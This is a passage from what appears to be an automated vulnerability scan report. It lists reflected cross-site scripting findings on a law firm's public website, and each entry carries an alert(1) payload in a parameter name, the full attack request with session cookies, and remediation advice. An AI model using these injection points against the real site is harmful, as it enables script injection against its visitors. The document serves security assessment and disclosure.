GET /diversityoverview?8c748'-alert(1)-'750bc24037f=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.14. http://www.cov.com/diversityupdate [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/diversityupdate
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2d31'-alert(1)-'bf8e984b8ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /diversityupdate?c2d31'-alert(1)-'bf8e984b8ec=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.15. http://www.cov.com/extranet [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/extranet
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f529'-alert(1)-'c70c33782c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /extranet?6f529'-alert(1)-'c70c33782c6=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.16. http://www.cov.com/firmoverview [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/firmoverview
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d58f'-alert(1)-'8538235fe28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /firmoverview?9d58f'-alert(1)-'8538235fe28=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title id="ctl00_htmlTitle">Covington & Burling LLP | About the Firm | Firm Overview</title> <meta n ...[SNIP]... ocument.aspnetForm.action = '/firmoverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/firmoverview/AboutSection.aspx?9d58f'-alert(1)-'8538235fe28=1';//]]> ...[SNIP]...
2.17. http://www.cov.com/forum [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/forum
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb6be'-alert(1)-'7a5f32d74e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum?cb6be'-alert(1)-'7a5f32d74e6=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.18. http://www.cov.com/honorsrankings [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/honorsrankings
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4088'-alert(1)-'6fb7096a36d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /honorsrankings?f4088'-alert(1)-'6fb7096a36d=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.19. http://www.cov.com/leadersindiversity [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/leadersindiversity
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cac5'-alert(1)-'90719ebe248 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /leadersindiversity?1cac5'-alert(1)-'90719ebe248=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.20. http://www.cov.com/legalnotices [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/legalnotices
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0792'-alert(1)-'83d5d12175f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /legalnotices?a0792'-alert(1)-'83d5d12175f=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.21. http://www.cov.com/mclarty [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/mclarty
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 354a9'-alert(1)-'6c85014edb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mclarty?354a9'-alert(1)-'6c85014edb2=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.22. http://www.cov.com/news/detail.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/news/detail.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b350e'-alert(1)-'c5433843e1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/detail.aspx?b350e'-alert(1)-'c5433843e1a=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
The value of the news request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9eb11'-alert(1)-'81ed8e1df91 was submitted in the news parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/detail.aspx?news=15409eb11'-alert(1)-'81ed8e1df91 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.24. http://www.cov.com/newsandevents [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/newsandevents
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f75a8'-alert(1)-'99f649b592f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsandevents?f75a8'-alert(1)-'99f649b592f=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.25. http://www.cov.com/offices [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/offices
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c98b'-alert(1)-'fd3b25fecf2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /offices?2c98b'-alert(1)-'fd3b25fecf2=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.26. http://www.cov.com/practice [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/practice
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4da1'-alert(1)-'610b8b730dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /practice?f4da1'-alert(1)-'610b8b730dc=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.27. http://www.cov.com/practice/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/practice/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c53e5'-alert(1)-'9529b8f7a51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.28. http://www.cov.com/privacypolicy [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/privacypolicy
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df5e0'-alert(1)-'cd34e2cebf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacypolicy?df5e0'-alert(1)-'cd34e2cebf=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.29. http://www.cov.com/probonooverview [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/probonooverview
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb241'-alert(1)-'14889ea6214 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /probonooverview?eb241'-alert(1)-'14889ea6214=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.30. http://www.cov.com/publications [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/publications
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37aa1'-alert(1)-'7b6396f21de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /publications?37aa1'-alert(1)-'7b6396f21de=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
2.31. http://www.cov.com/recruitingthebestandbrightest [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cov.com
Path:
/recruitingthebestandbrightest
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c57c0'-alert(1)-'7612bb35499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /recruitingthebestandbrightest?c57c0'-alert(1)-'7612bb35499=1 HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
